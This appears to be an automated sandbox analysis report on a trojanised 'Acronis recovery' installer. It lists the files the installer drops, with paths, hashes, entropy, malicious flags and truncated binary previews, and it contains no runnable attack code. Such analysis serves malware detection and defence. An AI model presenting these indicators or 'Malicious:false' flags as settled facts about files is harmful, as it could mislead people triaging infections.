                                                                                                                                                                                                                                        SHA-256:03A54FA62214648FDC63126C05934292DA4E701C3F2E35464B072CD8C2387F66
                                                                                                                                                                                                                                        SHA-512:E93E53653AF189115C8FD8E76CD3C72FD167468DCE585FCA58369458038BE9AC38A2F96E56CBCEB7BF5A26D89A59AAF7694DE77A0B4D27E6EE3E83228B625D06
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..MFX..MK.-q.......U..1.p..&...$:...@.E~.;.....w0..V.....J&va......`O.e`........d.R..4X..W..f..#$.s.F)....1.Wx..Q...-j....Q.f=.....:..l...&...=%y{.o.'k.0.5.Op.G...y.3...\...r/.....2^U....P.,...U.Q}..H0..8D....!.a...+8..Eb$...9.Y.J[y.R...E.0duK.h.?.......=]xPYd....5...,d....7.cEjk..G.v.`./...U..3.|`.|...........K.OX.H*,\.oBI...0f...o....Z.....Jd.t.R4.~...'E...../.p6J..=.w.z....#.{c..H.!6F....O=L.ad...,..d.(.d.b?*.RsT...?.._^.~..u.T.l.N}r..rP. .B..`gH.i..lk...N~...X..%........Q....wehM...m.d$.)}.=.O...4Q...q.<4....,..Q{C...8...~...D...B..Po)1ON..PkMQ.o.....0.U....e.q$.*..A.'..-&?\o.9j.....|..|../g.)...&.b...'..p(b"..JuL..X.hwmP...+......<...........3....C^r..|.L..Z..5.l..B..."W.R...9.'...Q........~f......;..o...X[!.t..O...'g............y.>....\G.W..kwR>..$..{Z.........N~..pa.7.a.+.hF...xT.....$?...Q3o.(.>._.".p..{]y..._.....L"....../?rN..28..,W..".M>.@#_8>...-.y.?.K...........@....{..9.....4...|]...b.)C...j.p`[6..~.HK..lJ..LS...H}AU3!EA
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148480
                                                                                                                                                                                                                                        Entropy (8bit):6.679488307607274
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:PF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxo:dBmmLsiS+SAhClbfSCOMVIPPg
                                                                                                                                                                                                                                        MD5:705C2448A0B9D068E72379DD16CCDD73
                                                                                                                                                                                                                                        SHA1:70EB0F1C607851405D21E7CFAA79D06D5700E425
                                                                                                                                                                                                                                        SHA-256:5CA53955C5C6A30CC8F9524A4F7039D474EE07C337D20849CF0705D476430F44
                                                                                                                                                                                                                                        SHA-512:7D2D322FB64D7A7365869A02D0CE3347C31A033FF523022EEC2BD853134103BBE5D6CD946CD7B8BC1AB90C7B4E7C93C9AAB47BF2C46D3F1EA8DFBC524E2329AB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:^]..U.....}..u..R_.........Z......E.u..M........E.PQQ..j..u..].P./.......E.P.`....E....}..t..E.P......]..U..QQ.E..E..E.P.u..E.......YY..]..U..QQ.E..E..E.P.u..E...5..YY..]..U..........L.3.E..E.V.u...t...u..^...........3.@."......Q.M.QP.,...V......QP.........U.^..t..M....M.3...u....]..U.......SW.}.........u.j.X.$......M..8...f..f.E..A....E...<....E..@.......f..f.E..A...j..u.....YY..u.f.U.V.u.j-Y......f;.j+....u..Xf;.t.f;.u...f.....f.U...f..I......f..i......f..N..f...f..n..\...j03.X.].].f;.u8......q..7..xt...Xt.P......f.U...f...F..E..f.U....M.u.E.....].j0.E.Xf;.u.P..^..f.....f.U...f;.t.u.j0X.}.3...E.:....d...........E.`...I.E.j.......E.........H.........D....E.f....|...p....E......\........E.f....t...p....E......L........E.f....l...p....E.f....T...p....E......E......E.f....E.p....E.P....E.Z....E......E......E. ....E.*....E.@....E.J....E......x........p........h........`........X...A....P...Z....E.a....E.....f;.......f;U.s.....0.....f;.d.........f
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2624
                                                                                                                                                                                                                                        Entropy (8bit):7.924560140167433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:J5vu2jenhkm+v3+/8CVlxKPZBHEOHTccP4JgzpWA37wUrDKPAGS07Q:J5vu2kkm+v3+/hDxKBBHE2ThPsU1rZ
                                                                                                                                                                                                                                        MD5:13948D21219B28F303F621DBAEC48120
                                                                                                                                                                                                                                        SHA1:0ED13940BA622FF24AC205303D5D5F80F28205AD
                                                                                                                                                                                                                                        SHA-256:F869A6AC60DA57200D8948D54146A5D51C095BAEC3BFE91252643AEAED059520
                                                                                                                                                                                                                                        SHA-512:D05956FEAEC0185F93B5FCC12F35B7068C80562A46AB88421365CFC56786A157104002EC18EF8D0D507092EF35A3BB906DE19868A689CCEF836941C1FD8D103A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.:.....<.&.".....$.3tUR....|.t/n....Z|..~.t..F..s=/..[.4.Q..E.<...y......m.e...T....h}i.v..p....|!..*4=.8Z%.D.+L..X..o1.k.9i.L[p..`.r...P.]...&..E4cp.R~Q.F~.../.....;.....-.._8...>._..!v..V.....`x..W.$.`.(........v_....y..[|........E@.*F]a|}-.4VY...'...I..].V......@.L.+K.sO...2Z.E.......p..X%.'W>........~.,#..A..E..o....mWE.Ct.+8.%...}>.]...+."..e..L..O.f.*M....I.V.......T......)j.......R....E.`?B.w.Lq."...].....e......./.!...y....S.i'...@P.j1...Q.h.i...0S.%u.|...[..zr)......~...l.]F..g..5<*E...q..?.1.e.;..7e.n......h(f...<.@z...!a2R.a..+/.._t..Y[..P.g......Yb.R.e..9.y.../.TA='.'u.K..i....5..0m..0.L.....R.c../q. %Q.\..._@D".RU..n.z..P...a..4`...`..M..6...&e].k....A..z...;..e.?.R(OF<.*...6p.$..r.r(-1.1...h.....w...u@`.T2.m..8z......dz.. .X.].Onb...uk&#.x..+<.p.'.,@.;0;.b.N.qk..s..}.^..x'oM6..x..q-.De..!N..8.....7.!.....[x0.'3.......U.A..z...^...mN....A.8..D.=..............,9e......7.7V.]8.r....B...yB..=. |.$T~K...jv.~C...r.....#..aB..H.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):104448
                                                                                                                                                                                                                                        Entropy (8bit):5.466669665581871
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SG:SklMBNIimuzaAwusPd
                                                                                                                                                                                                                                        MD5:AB180A93C7B9A2250BAE36E890768D8C
                                                                                                                                                                                                                                        SHA1:545B35567FDDE09CED64794EF02DC71CF54AED0F
                                                                                                                                                                                                                                        SHA-256:2165EA159F34A517996F3428BBC713F71DE715487059B176AD660C9DB5F19AB4
                                                                                                                                                                                                                                        SHA-512:405F9330EC33AF461A956C3F0FAAD349C0DBB64EB9233894F9442B3518A6525507034866D7E0D094C4A12998508CA3FAACF8494AFEE38234C88FBCF55A2E2C0C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......@...P...?..[..p&>.......@......?h4.M..A>.....@.@.......?E.p.l.E>.......@....+..?.o..$.E>.......@...h...?\...*.K>.......@.......?-.?...B>.....@.@...P8..?.(l.|.@>.......@....p!.?u...@.J>.......@...@p-.?..V...1>.......@....89.?.....5>.....@.@...<.D.?.....7>.......@...h)P.?.R`D.OG>.......@....T[.?9%....K>.......@....Mf.?.../.<>.....@.@.....q.?.....?>.......@.....{.?4..2G<>.......@...L...?....|/>.......@....Y..?...s..@>.....@.@....k..?....a@>.......@...XS..?x(3..u8>.......@.......?v.O,ib.>.......@......?..&L.C>.....@.@.......?..}...L>.......@....X..?Lo.....>.......@....x..?-....9>.......@....s..?6FID.?9>.....@.@...8J..?....gsL>.......@...d...?....y..>.......@......?>.&.09C>.......@.......?....<.A>.....@.@...(J..?.I..V.C>.......@...`w..?..^.@.N>.......@.......?.#..%.@>.......@....s..?...M..K>.....@.@....D'.?..Q..->.......@.......?9.!...G>.......@.....6.?......1>.......@.....>.?.1..NcB>..... .@....cE.?..s..1>.....@.@...L.L.?..n.H.N>.....`.@...H.S.?.W....$>.......@...8.Z.?.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):62464
                                                                                                                                                                                                                                        Entropy (8bit):6.690253969108149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+GC:laW2UDQWf05mjccBiqXvpC
                                                                                                                                                                                                                                        MD5:B9E28F7D26CC55A2697AB3672CF8B427
                                                                                                                                                                                                                                        SHA1:6D8BF6F962030BF2383AE7C95F339242AB628FC8
                                                                                                                                                                                                                                        SHA-256:B1FFC6A25321FB50B1B38A4137AB5EE00A480B74B64A72427D64AC3CC4A455C7
                                                                                                                                                                                                                                        SHA-512:D20035A4744011379DFEC4DA3C20FDD9AB40053FFA1D0D8F9357626E9892B940E11CB3CB38D282B7730C992A937FD55D8D6C06C7853799E4C9CF7046DBA26CDC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...WP.E......&.3.f..C.e...e...x..}..Y~Mj.Z..xF.E....x.A.f...wF.....0.u....SRP.}.....E..V.O....j..E..E....@.E.Z;E.|............_^[..A.f;............7.U...8SV.u.W...F..X...{......... ....K..E......A....E.A..E..A..M.U.E...3.]..A..E..E.A..E..A..U.E....}..t..M......}....[....}..t..E..P.W.......O....~...........N.P.E.P...\%..P.&....u......]B...F......>.M..D..._^..[....U..}....L.....L)M....t4.U..B....w).@)M.........\.......;M.t..u..7...3.@]...3...U......TSV.u.W...F.....{..............K..D$......A....D$(.A..D$,.A..L$$.T$$.D$0..3.\$..A..D$..A..D$..A..T$..D$ ...|$..t..L$$.g....|$.........L$......t$..t$.....I..D$...P..............~.........F..H...$...........F..H...#...D$...T............L$D......D$.f.t$TP.L$H......L$..L$\....I...X...j..D$\.o[..Y.L$DQ...9........{.....T.....X....L$D..\........L$....._^3.[..]...U..V..j..f...f....[..Y.u............^]...U..U......B..A..B..A..B..A....B..A..B..A..B..A..B..A...]...U......DSV.u.W..3.L$..L$ .v.....................E.j*.@..p......
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101376
                                                                                                                                                                                                                                        Entropy (8bit):6.249290243941694
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Kg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3n:d5vPeDkjGgQaE/n
                                                                                                                                                                                                                                        MD5:34C1BB59F1E59F491E1F9913C906D5ED
                                                                                                                                                                                                                                        SHA1:A17AADA9CF6378B2927FE665B01C1231E655DE93
                                                                                                                                                                                                                                        SHA-256:1485A4C19776F95875043A80CCD7223830BF9F3E6A27E87CECBCB30DF1B11587
                                                                                                                                                                                                                                        SHA-512:545C3826B0FFCA87A310EF146AA4EBEC74196609CFB0F5EEA3B085D0B3C15D865C1596F64A1AA1A00DAB4A3A9F0429612A6BD4FAA06BE58B8039EC27F8B06904
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.|..........}..t...|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......@)M..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102400
                                                                                                                                                                                                                                        Entropy (8bit):6.62751781696343
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:0XnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVO:03tb2j6AUkB0CThp6vmVO
                                                                                                                                                                                                                                        MD5:17BC06C71DDD7059916E5AABE0DA48B4
                                                                                                                                                                                                                                        SHA1:9E9F45880E943D4901C1873DE664ED12C2254932
                                                                                                                                                                                                                                        SHA-256:FC3CB814D3541064F45A199788AD1865571496F08635ABE48AE3BCEC74D63F76
                                                                                                                                                                                                                                        SHA-512:267E24182DAD10499FBFFB3CE1926A2F1D790EF832621D99145CFC0C4698D67222E96A1FE47DC480EC17C07EE81E38A0D4472DB5817E9B8CC978AEFF48B4F591
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...t.e...U...Rj..U.R.u.Q.P...x.}..t......u...<...u.........u.....@.I....U..Vj.hD.J..u......u......t2j.hd.J..u.........t.j..F.P.u.........t...@......V.P..E..03.^]...U..V.u..F$P..@.I...u...t.Q.......3.^]...V..N ..t..v...Q.P..F P...Q..f .^.U....SVW.}....@........j..E.3.PQ.]...o..........................yF..$..xF........4....fI.E.f......9]..........t....F..0.u...<.I.....V.M..q....E.P.u...8.I..E.P..p.I..i....Q...M....[...M...M....Q..J....P...M.f...;....P......s......Q...E........Q...E......~..u....E..K..._^[...xF..xF..xF..xF.<xF..xF.#xF._xF..xF..xF..xF.........................V..W3.9~.v..F......t.Q.cA...F..$..G;~.r.f.._^.V..W3.9~.v..F.j..4......F.YY.$..G;~.r.f.._^.V..W.N..y...t.Q.......~...u.!~._^.U..SVWj........3.Y.u.......I..^..^..^..^.....9_.t..G..p....w....w._^[]...U..VW...G.9G.uN...j.X;.r...3.G.j.Z.........Q.I.........Yt..G...t....P.w.V.A....w..-.......w.j.......Y.u...f........W..O..4..G._^]...U..V..F.9F.uP...j.X;.r...W3.F.j.Z.........Q.....~....Yt..F...t.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33143
                                                                                                                                                                                                                                        Entropy (8bit):7.181878880158946
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:KGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:KGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                        MD5:5326C3A5E46BF8783A052E8304C7B6F2
                                                                                                                                                                                                                                        SHA1:E5E7EDBC039046B12AAD6B4C457AC0B2C82BFC33
                                                                                                                                                                                                                                        SHA-256:3F1AF39BACF153B601DDE9E26D993D5BF4619122DD7D6E9A8D083D6AAD990FDE
                                                                                                                                                                                                                                        SHA-512:F54C6739402F46C69A10DFE7D80395943294660B7A81FFF299DA5F21AAB0799F2BC1EF76ED8F4B57E9F9930DCFA37FF746D41D19FA5C228400B461E3C5556EAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:=.=.='=1=<=D=H=N=R=X=b=l=v=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>!>'>1>;>E>P>X>\>b>f>l>v>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?'?+?1?5?;?E?O?Y?d?l?p?v?z?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.p..8....0.0.0.0.0(030;0?0E0I0O0Y0c0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1.1.1(121<1G1O1S1Y1]1c1m1w1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2(2,222<2F2P2[2c2g2m2q2w2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3*32363<3@3F3P3Z3d3o3w3{3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4.4.4)434>4F4J4P4T4Z4d4n4x4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.5.5#5)535=5G5R5Z5^5d5h5n5x5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6!6)6-63676=6G6Q6[6f6n6r6x6|6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7 7*757=7A7G7K7Q7[7e7o7z7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8 8*848>8I8Q8U8[8_8e8o8y8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9 9$9*9.949>9H9R9]9e9i9o9s9y9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:!:,:4:8:>:B:H:R:\:f:q:y:}:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;!;+;5;@;H;L;R;V;\;f;p;z;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18610385
                                                                                                                                                                                                                                        Entropy (8bit):7.988718937379966
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:393216:/AsuyDZ9JgjA3J3f0jec34HR0h72YZY4GO79KRaCwGt3xdBYDum1k:YK95ZsL4H6hdnGRgGbBYDm
                                                                                                                                                                                                                                        MD5:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                        SHA1:EC206D4E793A203DF221F456FD9E626EB3E8D9EC
                                                                                                                                                                                                                                        SHA-256:85082DA27713BE48EF8CE523370111F97F0A54E2BE4CECE2463CC5671513B4C4
                                                                                                                                                                                                                                        SHA-512:C3312A6C26455EBD86683058D4E7C49D6D92EBB42CC617A559317DE11FA54CAB7B45C8A7CC114F73DC295E68A977382F846BD2F662AF89AC918AF3A59566E5C9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@..................................'....@......@...................p..q....P......................y...XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3366912
                                                                                                                                                                                                                                        Entropy (8bit):6.530548523709476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                                                                                                        MD5:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                        SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
                                                                                                                                                                                                                                        SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
                                                                                                                                                                                                                                        SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3366912
                                                                                                                                                                                                                                        Entropy (8bit):6.530548523709476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                                                                                                        MD5:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                        SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
                                                                                                                                                                                                                                        SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
                                                                                                                                                                                                                                        SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3366912
                                                                                                                                                                                                                                        Entropy (8bit):6.530548523709476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                                                                                                        MD5:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                        SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
                                                                                                                                                                                                                                        SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
                                                                                                                                                                                                                                        SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
